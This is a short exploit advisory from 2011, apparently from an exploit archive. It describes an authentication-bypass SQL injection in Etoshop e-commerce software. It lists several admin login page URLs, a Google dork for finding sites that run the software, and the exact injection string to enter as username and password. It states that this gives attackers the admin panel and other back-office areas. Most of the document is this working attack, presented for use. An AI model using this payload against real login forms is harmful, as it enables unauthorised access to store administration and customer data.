%+ $.......#........4.........|)........0............\/\/ %+ %+ %+ %++++++++++++++++++++++++++++++++++++++++ # Exploit Title: Etoshop(Auth Bypass) SQLi Vulnerability # Vendor: http://www.etoshop.com # Date: 12th july,2011 # Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D ( http://www.shadowrootkit.wordpress.com) # Google Dork: ©2000 INNER ESTEEM SDN BHD ***************************************************************************************************************************************** ***************************************************************************************************************************************** (Auth ByPass) SQLi Vulnerability *************************************** {DEMO} : http://www.etoshop.com/demo/pcstore/admin.asp http://www.etoshop.com/demo/sbd-login.asp http://www.etoshop.com/demo/cac-login.asp http://www.etoshop.com/demo/csf-login.asp EXPLOIT: Username: ' or 'a'='a Password: ' or 'a'='a Observe: Attackers can use Authentication Bypass to get into Admin Panel,storebuilder,c2c auction,classifieds in the site. ******************************************************************************************************************************************** gr33t1ngs to s1d3 effects and my friends@!3.14-- ********************************************************************************************************************************************